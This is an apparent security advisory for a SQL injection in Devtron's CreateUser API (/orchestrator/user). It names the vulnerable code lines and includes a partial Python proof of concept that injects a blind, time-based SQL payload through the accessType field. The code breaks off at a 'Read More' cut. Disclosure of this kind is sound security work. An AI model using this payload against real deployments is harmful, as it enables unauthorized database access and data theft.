Summary An authenticated user (with minimum permission) could utilize and exploit SQL Injection to allow the execution of malicious SQL queries via CreateUser API (/orchestrator/user). Details The API is CreateUser (/orchestrator/user). The function to read user input is: https://github.com/devtron-labs/devtron/blob/4296366ae288f3a67f87e547d2b946acbcd2dd65/api/auth/user/UserRestHandler.go#L96-L104 The userInfo (line 104) parameter can be controlled by users. The SQL injection can happen in the code: https://github.com/devtron-labs/devtron/blob/4296366ae288f3a67f87e547d2b946acbcd2dd65/pkg/auth/user/repository/UserAuthRepository.go#L1038 The query (line 1038) parameter can be controlled by a user to create and execute a malicious SQL query. The user should be authenticated but only needs minimum permissions: PoC Demonstrate a blind SQL injection to retrieve the database name: “` import requests import time import string import argparse def blind(ip, token, query): url = f"https://{ip}/orchestrator/user" headers = {"token": token} entity = "chart-group" payload = f"'; {query} –" data = {"id": 111, "email_id": "abcd123@126.com", "superAdmin": False, "roleFilters":[{"team":"", "environment":"", "action": "", "entity": entity, "accessType": payload}]} #"EntityName": "test", "AccessType": "test", "Cluster": "","NameSpace": "devtroncd", "Group": "", "Kind": "", "Resource": "", "Workflow": "" start = time.time() res = requests.post(url, headers=headers, json =…Read More
